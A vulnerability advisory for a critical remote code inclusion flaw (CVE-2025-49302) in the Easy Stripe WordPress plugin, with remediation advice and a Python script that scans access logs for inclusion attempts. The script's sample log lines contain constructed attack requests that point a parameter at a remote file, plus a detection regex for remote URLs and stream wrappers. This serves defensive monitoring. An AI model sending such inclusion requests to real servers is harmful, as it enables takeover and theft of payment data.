CVE-2025-49302
Scott · Scott Paterson Easy Stripe
Executive summary
A critical remote code inclusion vulnerability exists in Scott Paterson's Easy Stripe plugin, which could allow an unauthenticated attacker to execute arbitrary code and achieve complete system compromise.
Vulnerability
The software contains a code injection flaw that allows for remote code inclusion. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the target server, requiring no user interaction or prior access.
Business impact
A successful exploit would grant an attacker complete control over the affected server, leading to potential theft of sensitive customer and payment data, service disruption, and significant reputational damage. The CVSS score of 10.0 reflects the critical nature of this vulnerability, indicating maximum impact with minimal exploitation complexity.
Remediation
Immediate Action: Administrators must immediately update the Easy Stripe plugin to a version higher than 1.1, or the latest version provided by the vendor, to patch this vulnerability.
Proactive Monitoring: Review web server access logs for unusual requests to plugin-related files. Monitor for unexpected outbound network connections or anomalous process execution on the server.
Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with rules designed to detect and block remote code inclusion and code injection attack patterns.
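An added example of the log review recommended above (not code from the advisory or from the plugin vendor): it scans constructed Apache-style access-log lines for requests under the plugin directory whose query parameters carry a remote URL or PHP stream wrapper, the same pattern a WAF rule for remote code inclusion would key on. The plugin path and the file name example.php are assumptions, since the advisory names neither.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed plugin directory; the advisory does not give the slug, so set this
# to the path the plugin actually occupies on your install.
PLUGIN_PATH = "/wp-content/plugins/easy-stripe/"

# Parameter values that reference a remote resource or a PHP stream wrapper,
# the hallmark of a remote code inclusion attempt.
REMOTE_REF = re.compile(r"^(?:https?|ftps?|php|data)://", re.IGNORECASE)

# Common/combined log format: client, identd, user, [timestamp], "request", status, bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_requests(lines):
    """Return requests to the plugin path whose query parameters point at a remote resource."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(PLUGIN_PATH):
            continue  # only requests to plugin-related files are of interest here
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_REF.match(value.strip()):
                findings.append({
                    "ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                    "path": parts.path, "param": key, "value": value,
                })
    return findings


# Constructed sample log lines; example.php is a placeholder, not a real plugin file.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2025:12:00:01 +0000] "GET /wp-content/plugins/easy-stripe/example.php?amount=1000 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jun/2025:12:00:02 +0000] "GET /wp-content/plugins/easy-stripe/example.php?page=http://203.0.113.99/x.txt HTTP/1.1" 200 1024',
    '198.51.100.7 - - [10/Jun/2025:12:00:03 +0000] "GET /wp-content/plugins/easy-stripe/example.php?page=https%3A%2F%2Fexample.net%2Fz HTTP/1.1" 500 0',
    '192.0.2.11 - - [10/Jun/2025:12:00:04 +0000] "GET /index.php?u=http://example.org/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']} -> {f['status']}")
```

A hit with a 200 status deserves the closest look, since the include apparently succeeded; a 500 may still mean the server fetched the remote file before failing.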
Exploitation status
Public Exploit Available: Not Specified.
Analyst recommendation
Given the critical severity (CVSS 10.0) and the potential for complete system compromise by an unauthenticated attacker, this vulnerability represents a severe and immediate threat. We strongly recommend that all administrators of systems using the Easy Stripe plugin apply the necessary updates without delay to prevent exploitation.